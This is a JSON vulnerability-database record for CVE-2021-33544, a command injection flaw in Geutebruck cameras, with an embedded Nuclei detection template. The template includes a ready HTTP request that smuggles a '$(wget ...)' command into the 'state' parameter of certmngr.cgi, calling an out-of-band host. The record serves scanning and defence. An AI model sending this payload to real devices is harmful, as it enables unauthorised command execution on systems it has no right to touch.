{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-33544/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-33544/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-33544/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-33544/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-33544/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-33544"},"sightings":{"href":"/api/v1/sightings/cve-2021-33544"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-33544.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2021-33544\n\ninfo:\n  name: Geutebruck - Remote Command Injection\n  author: gy741\n  severity: high\n  description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.\n  remediation: |\n    Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.\n  reference:\n    - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\n    - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/\n    - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-33544\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.2\n    cve-id: CVE-2021-33544\n    cwe-id: CWE-78\n    epss-score: 0.953\n    epss-percentile: 0.99864\n    cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: geutebrueck\n    product: g-cam_ebc-2110\n  tags: cve2021,cve,geutebruck,rce,oast,geutebrueck,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 490a00463044022020d382cc1e4e79d998fc1f3c2fb2a00321b193d4e7b3b417073af150d216ff980220453f42150e1e670da86eeceeb23ddb21bf25385e3c283bcf61c3107770d115d8:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-33544"}